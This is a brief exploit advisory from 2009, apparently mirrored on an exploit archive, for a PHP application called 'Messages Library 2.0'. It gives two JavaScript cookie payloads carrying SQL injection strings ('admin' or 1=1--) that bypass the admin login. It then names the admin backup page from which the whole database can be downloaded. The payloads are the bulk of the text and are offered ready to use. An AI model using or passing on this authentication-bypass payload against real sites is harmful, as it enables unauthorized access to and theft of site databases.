Home / os / win10

messageslib-database.txt

Posted on 02 July 2009

# Messages Library 2.0 <= Arbitrary Database Download Vulnerability ######################################## #[*] Founded & Exploited by : Stack ######################################## Bypass with javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/"; javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/"; After Exec http://localhost/sms/admin/backup.php and you got the database download

 

TOP

Malware :